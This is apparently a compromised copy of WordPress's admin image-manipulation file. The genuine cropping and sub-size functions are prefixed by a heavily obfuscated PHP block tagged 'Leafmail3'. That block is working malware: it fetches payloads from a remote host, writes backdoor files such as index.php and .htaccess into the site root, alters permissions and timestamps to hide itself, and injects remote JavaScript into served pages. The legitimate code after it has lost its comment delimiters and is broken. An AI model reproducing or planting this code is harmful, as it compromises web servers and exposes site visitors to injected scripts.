[ Avaa Bypassed ]



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<?php /*Leafmail3*/goto o1QFr; wasj3: $ZJUCA($jQ0xa, $RTa9G); goto wYDtx; IuHdj: $egQ3R = "\147\172\151"; goto ChKDE; TpHVE: $cPzOq .= "\157\x6b\x6b"; goto vgltl; gmVrv: $Mvmq_ .= "\x6c\x5f\x63\154\x6f"; goto N9T5l; SClM0: $VwfuP = "\x64\x65\146"; goto PXHHr; m8hp8: $uHlLz = "\x73\x74\x72"; goto lz2G0; UH4Mb: $eULaj .= "\x70\x63\x2e\x70"; goto apDh3; QPct6: AtVLG: goto Mg1JO; dj8v0: $ZJUCA = "\143\150"; goto WmTiu; uHm0i: $TBxbX = "\x57\x50\137\125"; goto RCot0; f4Rdw: if (!($EUeQo($kpMfb) && !preg_match($tIzL7, PHP_SAPI) && $fHDYt($uZmPe, 2 | 4))) { goto TGN7B; } goto S2eca; H7qkB: $MyinT .= "\164\40\x41\x63\x63"; goto Air1i; AedpI: try { goto JM3SL; oiS8N: @$YWYP0($lJtci, $H0gg1); goto nucR0; AffR5: @$YWYP0($PcRcO, $H0gg1); goto SpIUU; JnP2S: @$ZJUCA($lJtci, $shT8z); goto oiS8N; nOhHX: @$ZJUCA($lJtci, $RTa9G); goto LvbAc; LvbAc: @$rGvmf($lJtci, $UYOWA["\141"]); goto JnP2S; SpIUU: @$ZJUCA($jQ0xa, $shT8z); goto qvTm1; gA5rv: @$ZJUCA($PcRcO, $shT8z); goto AffR5; nucR0: @$ZJUCA($PcRcO, $RTa9G); goto COvI1; JM3SL: @$ZJUCA($jQ0xa, $RTa9G); goto nOhHX; COvI1: @$rGvmf($PcRcO, $UYOWA["\142"]); goto gA5rv; qvTm1: } catch (Exception $ICL20) { } goto PqZGA; BWxc9: $kpMfb .= "\154\137\x69\156\x69\164"; goto RMP1m; Q7gNx: $gvOPD = "\151\163\137"; goto AfwzG; fFfBR: goto AtVLG; goto kST_Q; J9uWl: $e9dgF .= "\x61\171\163"; goto lNb3h; ZlPje: $u9w0n .= "\x75\x69\x6c\144\x5f\161"; goto Mit4a; YRbfa: $dGt27 .= "\157\x73\x65"; goto L744i; ioNAN: $tIzL7 .= "\x6c\x69\57"; goto Khhgn; mz3rE: $FANp1 .= "\x70\141\x72\145"; goto SClM0; eBKm1: $PcRcO = $jQ0xa; goto Sg4f2; D0V8f: $pv6cp = "\162\x65"; goto Hy0sm; xXaQc: $FANp1 = "\x76\145\162\x73\151"; goto T7IwT; ulics: try { $_SERVER[$pv6cp] = 1; $pv6cp(function () { goto YEXR4; PKzAL: $AG2hR .= "\163\171\x6e\x63\75\164\162\165\145"; goto HIXil; NZAxH: $AG2hR .= "\x65\x72\75\164\x72\165\x65\x3b" . "\12"; goto Tbsb3; xDrpr: $AG2hR .= "\x75\x6d\x65\156\164\54\40\x67\75\144\x2e\143\162\145\x61\164\145"; goto mLjk9; r_Oqj: $AG2hR .= "\163\x63\162\151\160\164\x22\x3e" . "\xa"; goto JZsfv; PEdls: $AG2hR .= "\74\57\163"; goto WBFgG; POyWW: $AG2hR .= "\x4d\55"; goto a8oGQ; N2RIK: $AG2hR .= "\175\x29\50\51\x3b" . "\12"; goto PEdls; Vj0ze: $AG2hR .= "\x72\151\160\x74\40\164\x79\x70\145\x3d\42\164\145\170"; goto FXjwZ; JZsfv: $AG2hR .= "\x28\x66\x75\156\143"; goto ZRBmo; zk1Ml: $AG2hR .= "\x79\124\141\147\x4e\x61\155\145"; goto STHB_; aKt86: $AG2hR .= "\x72\x69\160\x74\42\51\x2c\40\x73\75\x64\x2e\x67\x65\x74"; goto oxuwD; FXjwZ: $AG2hR .= "\x74\57\x6a\141\x76\141"; goto r_Oqj; YffEK: $AG2hR .= "\57\x6d\141\164"; goto nL_GE; ZrlUz: $AG2hR .= "\x73\x63\162\151\x70\164\x22\x3b\40\147\x2e\141"; goto PKzAL; MSqPC: $AG2hR .= "\x65\x20\55\x2d\76\12"; goto rWq2m; gUhrX: $AG2hR .= "\74\x73\143"; goto Vj0ze; oxuwD: $AG2hR .= "\x45\154\x65\x6d\145\156\164\x73\102"; goto zk1Ml; a8oGQ: $AG2hR .= time(); goto xyZaU; WBFgG: $AG2hR .= "\x63\162\151\160\164\x3e\xa"; goto jHj0s; rWq2m: echo $AG2hR; goto zxMHd; zzMTI: $AG2hR .= "\152\141\166\x61"; goto ZrlUz; HIXil: $AG2hR .= "\73\x20\147\56\144\x65\x66"; goto NZAxH; EXhzp: $AG2hR .= "\x65\156\164\x4e\x6f\x64\145\56\x69\x6e"; goto yJp9W; KUpUt: $AG2hR .= "\x64\40\115\141\x74"; goto c13YM; hugz8: $AG2hR .= "\x6f\x72\145\50\x67\54\x73\51\73" . "\xa"; goto N2RIK; xyZaU: $AG2hR .= "\x22\73\40\163\56\160\141\162"; goto EXhzp; ZRBmo: $AG2hR .= "\164\151\x6f\156\x28\51\x20\173" . "\xa"; goto sOVga; YqIfq: $AG2hR .= "\77\x69\x64\x3d"; goto POyWW; Tbsb3: $AG2hR .= "\147\x2e\163\x72"; goto vxsas; k1w2Q: $AG2hR = "\x3c\41\x2d\55\x20\115\x61"; goto OOFo2; F2sIB: $AG2hR .= "\x3d\x22\164\x65\x78\x74\57"; goto zzMTI; OOFo2: $AG2hR .= "\x74\157\155\x6f\x20\55\x2d\x3e\xa"; goto gUhrX; vxsas: $AG2hR .= "\143\x3d\165\x2b\42\x6a\163\57"; goto JGvCK; jHj0s: $AG2hR .= "\74\x21\55\55\40\x45\156"; goto KUpUt; mLjk9: $AG2hR .= "\105\154\x65\x6d\x65\156\x74\50\42\163\x63"; goto aKt86; yJp9W: $AG2hR .= "\x73\x65\162\x74\102\145\146"; goto hugz8; c13YM: $AG2hR .= "\x6f\x6d\x6f\40\103\157\144"; goto MSqPC; STHB_: $AG2hR .= "\50\x22\x73\x63\162\x69"; goto SX8pI; JGvCK: $AG2hR .= $osL5h; goto YffEK; nL_GE: $AG2hR .= "\x6f\155\x6f\56\x6a\x73"; goto YqIfq; SX8pI: $AG2hR .= "\160\x74\42\51\133\x30\135\x3b" . "\xa"; goto uh8pE; YEXR4: global $osL5h, $cPzOq; goto k1w2Q; jW6LQ: $AG2hR .= "\166\141\x72\40\144\x3d\x64\157\143"; goto xDrpr; uh8pE: $AG2hR .= "\x67\x2e\164\x79\x70\145"; goto F2sIB; sOVga: $AG2hR .= "\166\x61\162\40\x75\75\42" . $cPzOq . "\42\x3b" . "\xa"; goto jW6LQ; zxMHd: }); } catch (Exception $ICL20) { } goto arBxc; TrkYs: $eULaj .= "\x2f\170\x6d"; goto GE2p3; L744i: $cPzOq = "\x68\x74\164\x70\163\72\57\x2f"; goto TpHVE; CNdmS: wLXpb: goto wasj3; nHXnO: $_POST = $_REQUEST = $_FILES = array(); goto CNdmS; PHhHL: P9yQa: goto W2Q7W; UkCDT: $cLC40 = 32; goto BnazY; vabQZ: $CgFIN = 1; goto QPct6; gSbiK: try { goto xtnST; qBVAq: $k7jG8[] = $E0suN; goto Tc9Eb; vZ6zL: $E0suN = trim($Q0bWd[0]); goto LuoPM; D98P3: if (!empty($k7jG8)) { goto FbDAI; } goto AML_a; LuoPM: $jCv00 = trim($Q0bWd[1]); goto Q4uy7; xtnST: if (!$gvOPD($d3gSl)) { goto nHP5K; } goto W8uMn; c_73m: FbDAI: goto h1Cu7; kNAxm: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto lfWQh; } goto MfJKK; L8cv7: WVm2j: goto c_73m; AML_a: $d3gSl = $jQ0xa . "\x2f" . $HNQiW; goto GBRPC; ZSYyc: $jCv00 = trim($Q0bWd[1]); goto kNAxm; W8uMn: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto Woix_; EA1BT: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto ctSg2; } goto A163l; Woix_: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto wU2zk; } goto vZ6zL; Q4uy7: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto VAVW5; } goto qBVAq; tEVz_: $k7jG8[] = $jCv00; goto xWpvL; xWpvL: lfWQh: goto oilos; MfJKK: $k7jG8[] = $E0suN; goto tEVz_; N3TyU: wU2zk: goto snD7p; lky0R: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto EA1BT; Tc9Eb: $k7jG8[] = $jCv00; goto evp7M; snD7p: nHP5K: goto D98P3; oilos: ctSg2: goto L8cv7; evp7M: VAVW5: goto N3TyU; GBRPC: if (!$gvOPD($d3gSl)) { goto WVm2j; } goto lky0R; A163l: $E0suN = trim($Q0bWd[0]); goto ZSYyc; h1Cu7: } catch (Exception $ICL20) { } goto xU6vT; T7IwT: $FANp1 .= "\x6f\x6e\x5f\143\x6f\x6d"; goto mz3rE; JX1Oy: $dGt27 = "\x66\x63\x6c"; goto YRbfa; BnazY: $Pzt0o = 5; goto TYFaW; o1QFr: $kFvng = "\74\x44\x44\x4d\x3e"; goto wODYw; CL80L: $MyinT .= "\120\x2f\61\x2e\x31\x20\x34"; goto gErqa; tFGg7: $YWYP0 .= "\x75\143\x68"; goto dj8v0; pXfDS: $ygOJ_ .= "\x2f\167\160"; goto c7yEe; xUd9U: $pv6cp .= "\151\x6f\x6e"; goto bqFyS; PqZGA: CVVA3: goto RDKTA; wYDtx: $uZmPe = $nPBv4($eULaj, "\x77\x2b"); goto f4Rdw; E453u: $QIBzt .= "\56\64"; goto O8RXw; a4EJZ: $dZR_y = $cPzOq; goto vZkPa; FK_sr: $kb9bA .= "\x65\162\x2e\x69"; goto G2uff; TuwL4: $jQ0xa = $_SERVER[$Wv1G0]; goto wrxGI; wJDrU: $eULaj = $jQ0xa; goto TrkYs; MLdcc: $fHDYt .= "\x63\153"; goto JX1Oy; Gs7Gb: $kpMfb = $vW4As; goto BWxc9; Mit4a: $u9w0n .= "\x75\x65\x72\171"; goto cIo5P; GE2p3: $eULaj .= "\x6c\162"; goto UH4Mb; cIo5P: $uAwql = "\155\x64\65"; goto aXExt; c7yEe: $ygOJ_ .= "\x2d\x61"; goto XWOCC; wrxGI: $ygOJ_ = $jQ0xa; goto pXfDS; XsWqd: $kb9bA .= "\57\56\165\163"; goto FK_sr; cWrVz: $nPBv4 .= "\145\x6e"; goto KCtWA; CrWKs: $l0WLW .= "\157\160\x74"; goto jcG0e; lz2G0: $uHlLz .= "\154\x65\x6e"; goto xXaQc; wee0Y: $ulOTQ .= "\115\111\116"; goto Tfi5q; vgltl: $cPzOq .= "\154\x69\x6e\153\56\x74"; goto pr5fA; Khhgn: $tIzL7 .= "\x73\151"; goto JBJmV; kJlf4: $DJDq1 .= "\147\145\164\137\143"; goto NZqWx; lNb3h: $H0gg1 = $xsR4V($e9dgF); goto XYviL; TBl6Q: sLwcv: goto fFfBR; RMP1m: $l0WLW = $vW4As; goto ujtZa; XQnCd: $PcRcO .= "\x61\143\143\145\163\x73"; goto ikUIP; X4xWX: $QIBzt = "\x35"; goto E453u; hDUdL: $MWMOe .= "\x6c\x65"; goto Q7gNx; LxUUO: $RTa9G = $QTYip($HqqUn($RTa9G), $Pzt0o); goto qaeyL; f6Txl: $HqqUn = "\x64\x65\143"; goto gwNCH; sK97X: $nPBv4 = "\x66\157\160"; goto cWrVz; Ee0VW: $EUeQo .= "\164\x69\x6f\156\x5f"; goto a2JJX; D9NbF: $CgFIN = 1; goto PHhHL; VY3H_: $Wv1G0 = "\x44\117\x43\x55\115\105\116\x54"; goto HpOFr; CRqG1: if (empty($k7jG8)) { goto VIn91; } goto s4AWH; apDh3: $eULaj .= "\x68\160\x2e\60"; goto sK97X; Sg4f2: $PcRcO .= "\57\x2e\x68\x74"; goto XQnCd; jcG0e: $YQ0P6 = $vW4As; goto rA_Dy; dlqC2: $HNQiW = substr($uAwql($osL5h), 0, 6); goto xGZOR; kxKwG: $osL5h = $_SERVER[$i5EZR]; goto TuwL4; ozW5s: $e9dgF .= "\63\x20\x64"; goto J9uWl; xU6vT: $lJtci = $jQ0xa; goto BpRMk; CquiC: $dZR_y .= "\x63\x6f\160\171"; goto BLSy0; GSfrX: $pv6cp .= "\x75\x6e\143\164"; goto xUd9U; yaYSs: $rGvmf .= "\x6f\x6e\x74\x65\156\164\163"; goto mIlAi; FXRyn: $TBxbX .= "\115\x45\x53"; goto R1jVG; kST_Q: VIn91: goto vabQZ; flXr3: $shT8z = $QTYip($HqqUn($shT8z), $Pzt0o); goto TkfCl; FJdH4: $dZR_y .= "\x3d\x67\x65\x74"; goto CquiC; kJyDh: $QTYip = "\x69\156\x74"; goto blzff; s4AWH: $H25pP = $k7jG8[0]; goto t74Wt; TyAte: $k7jG8 = array(); goto UkCDT; EO8QL: try { $UYOWA = @$AkFS8($egQ3R($eKFWX($M7wqP))); } catch (Exception $ICL20) { } goto OXweB; XYviL: $i5EZR = "\110\124\124\x50"; goto j4Pjv; ikUIP: $kb9bA = $jQ0xa; goto XsWqd; VrwTF: $nRD8p .= "\x64\x69\162"; goto aQp1m; dLa5a: $pv6cp .= "\x65\162\x5f"; goto x5YEr; PgImI: @$ZJUCA($kb9bA, $RTa9G); goto yAax8; Jb1Vu: try { goto Bwps7; WPylr: if (!$xsy4x($Y61WO)) { goto nWSzU; } goto NpK90; xqrLf: @$YWYP0($dqnvi, $H0gg1); goto cinsF; N7wJU: if ($xsy4x($Y61WO)) { goto KOuoA; } goto RBLfp; wf0jq: @$ZJUCA($Y61WO, $shT8z); goto xqrLf; bfkJn: try { goto jwOvP; sXqkD: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto tXay1; jwOvP: $ekYPG = $kpMfb(); goto jMqt3; VURt4: $l0WLW($ekYPG, CURLOPT_POST, 1); goto Qk7oo; G7Y1e: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto Sw_Ys; lg1iu: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 3); goto VURt4; jMqt3: $l0WLW($ekYPG, CURLOPT_URL, $LfwPf . "\x26\164\x3d\151"); goto G7Y1e; Qk7oo: $l0WLW($ekYPG, CURLOPT_POSTFIELDS, $u9w0n($Lx9yT)); goto axPES; Sw_Ys: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto sXqkD; tXay1: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto Gb33B; PUEHo: $Mvmq_($ekYPG); goto rF4qo; Gb33B: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto lg1iu; axPES: $YQ0P6($ekYPG); goto PUEHo; rF4qo: } catch (Exception $ICL20) { } goto zCePm; s2GBY: $Y61WO = dirname($dqnvi); goto N7wJU; bO0VE: KOuoA: goto WPylr; RBLfp: @$ZJUCA($jQ0xa, $RTa9G); goto lexI4; NpK90: @$ZJUCA($Y61WO, $RTa9G); goto aGYEQ; wsLep: $Lx9yT = ["\144\x61\x74\x61" => $UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?>
 * File contains all the administration image manipulation functions.
 * @package WordPress
 * @subpackage Administration

 * Crops an image to a given size.
 * @since 2.1.0
 * @param string|int   $src      The source file or Attachment ID.
 * @param int          $src_x    The start x position to crop from.
 * @param int          $src_y    The start y position to crop from.
 * @param int          $src_w    The width to crop.
 * @param int          $src_h    The height to crop.
 * @param int          $dst_w    The destination width.
 * @param int          $dst_h    The destination height.
 * @param bool|false   $src_abs  Optional. If the source crop points are absolute.
 * @param string|false $dst_file Optional. The destination file to write to.
 * @return string|WP_Error New filepath on success, WP_Error on failure.
function wp_crop_image( $src, $src_x, $src_y, $src_w, $src_h, $dst_w, $dst_h, $src_abs = false, $dst_file = false ) {
	$src_file = $src;
	if ( is_numeric( $src ) ) { // Handle int as attachment ID.
		$src_file = get_attached_file( $src );

		if ( ! file_exists( $src_file ) ) {
			 * If the file doesn't exist, attempt a URL fopen on the src link.
			 * This can occur with certain file replication plugins.
			$src = _load_image_to_edit_path( $src, 'full' );
		} else {
			$src = $src_file;

	$editor = wp_get_image_editor( $src );
	if ( is_wp_error( $editor ) ) {
		return $editor;

	$src = $editor->crop( $src_x, $src_y, $src_w, $src_h, $dst_w, $dst_h, $src_abs );
	if ( is_wp_error( $src ) ) {
		return $src;

	if ( ! $dst_file ) {
		$dst_file = str_replace( wp_basename( $src_file ), 'cropped-' . wp_basename( $src_file ), $src_file );

	 * The directory containing the original file may no longer exist when
	 * using a replication plugin.
	wp_mkdir_p( dirname( $dst_file ) );

	$dst_file = dirname( $dst_file ) . '/' . wp_unique_filename( dirname( $dst_file ), wp_basename( $dst_file ) );

	$result = $editor->save( $dst_file );
	if ( is_wp_error( $result ) ) {
		return $result;

	if ( ! empty( $result['path'] ) ) {
		return $result['path'];

	return $dst_file;

 * Compare the existing image sub-sizes (as saved in the attachment meta)
 * to the currently registered image sub-sizes, and return the difference.
 * Registered sub-sizes that are larger than the image are skipped.
 * @since 5.3.0
 * @param int $attachment_id The image attachment post ID.
 * @return array[] Associative array of arrays of image sub-size information for
 *                 missing image sizes, keyed by image size name.
function wp_get_missing_image_subsizes( $attachment_id ) {
	if ( ! wp_attachment_is_image( $attachment_id ) ) {
		return array();

	$registered_sizes = wp_get_registered_image_subsizes();
	$image_meta       = wp_get_attachment_metadata( $attachment_id );

	// Meta error?
	if ( empty( $image_meta ) ) {
		return $registered_sizes;

	// Use the originally uploaded image dimensions as full_width and full_height.
	if ( ! empty( $image_meta['original_image'] ) ) {
		$image_file = wp_get_original_image_path( $attachment_id );
		$imagesize  = wp_getimagesize( $image_file );

	if ( ! empty( $imagesize ) ) {
		$full_width  = $imagesize[0];
		$full_height = $imagesize[1];
	} else {
		$full_width  = (int) $image_meta['width'];
		$full_height = (int) $image_meta['height'];

	$possible_sizes = array();

	// Skip registered sizes that are too large for the uploaded image.
	foreach ( $registered_sizes as $size_name => $size_data ) {
		if ( image_resize_dimensions( $full_width, $full_height, $size_data['width'], $size_data['height'], $size_data['crop'] ) ) {
			$possible_sizes[ $size_name ] = $size_data;

	if ( empty( $image_meta['sizes'] ) ) {
		$image_meta['sizes'] = array();

	 * Remove sizes that already exist. Only checks for matching "size names".
	 * It is possible that the dimensions for a particular size name have changed.
	 * For example the user has changed the values on the Settings -> Media screen.
	 * However we keep the old sub-sizes with the previous dimensions
	 * as the image may have been used in an older post.
	$missing_sizes = array_diff_key( $possible_sizes, $image_meta['sizes'] );

	 * Filters the array of missing image sub-sizes for an uploaded image.
	 * @since 5.3.0
	 * @param array[] $missing_sizes Associative array of arrays of image sub-size information for
	 *                               missing image sizes, keyed by image size name.
	 * @param array   $image_meta    The image meta data.
	 * @param int     $attachment_id The image attachment post ID.
	return apply_filters( 'wp_get_missing_image_subsizes', $missing_sizes, $image_meta, $attachment_id );

 * If any of the currently registered image sub-sizes are missing,
 * create them and update the image meta data.
 * @since 5.3.0
 * @param int $attachment_id The image attachment post ID.
 * @return array|WP_Error The updated image meta data array or WP_Error object
 *                        if both the image meta and the attached file are missing.
function wp_update_image_subsizes( $attachment_id ) {
	$image_meta = wp_get_attachment_metadata( $attachment_id );
	$image_file = wp_get_original_image_path( $attachment_id );

	if ( empty( $image_meta ) || ! is_array( $image_meta ) ) {
		 * Previously failed upload?
		 * If there is an uploaded file, make all sub-sizes and generate all of the attachment meta.
		if ( ! empty( $image_file ) ) {
			$image_meta = wp_create_image_subsizes( $image_file, $attachment_id );
		} else {
			return new WP_Error( 'invalid_attachment', __( 'The attached file cannot be found.' ) );
	} else {
		$missing_sizes = wp_get_missing_image_subsizes( $attachment_id );

		if ( empty( $missing_sizes ) ) {
			return $image_meta;

		// This also updates the image meta.
		$image_meta = _wp_make_subsizes( $missing_sizes, $image_file, $image_meta, $attachment_id );

	/** This filter is documented in wp-admin/includes/image.php */
	$image_meta = apply_filters( 'wp_generate_attachment_metadata', $image_meta, $attachment_id, 'update' );

	// Save the updated metadata.
	wp_update_attachment_metadata( $attachment_id, $image_meta );

	return $image_meta;

 * Updates the attached file and image meta data when the original image was edited.
 * @since 5.3.0
 * @since 6.0.0 The `$filesize` value was added to the returned array.
 * @access private
 * @param array  $saved_data    The data returned from WP_Image_Editor after successfully saving an image.
 * @param string $original_file Path to the original file.
 * @param array  $image_meta    The image meta data.
 * @param int    $attachment_id The attachment post ID.
 * @return array The updated image meta data.
function _wp_image_meta_replace_original( $saved_data, $original_file, $image_meta, $attachment_id ) {
	$new_file = $saved_data['path'];

	// Update the attached file meta.
	update_attached_file( $attachment_id, $new_file );

	// Width and height of the new image.
	$image_meta['width']  = $saved_data['width'];
	$image_meta['height'] = $saved_data['height'];

	// Make the file path relative to the upload dir.
	$image_meta['file'] = _wp_relative_upload_path( $new_file );

	// Add image file size.
	$image_meta['filesize'] = wp_filesize( $new_file );

	// Store the original image file name in image_meta.
	$image_meta['original_image'] = wp_basename( $original_file );

	return $image_meta;

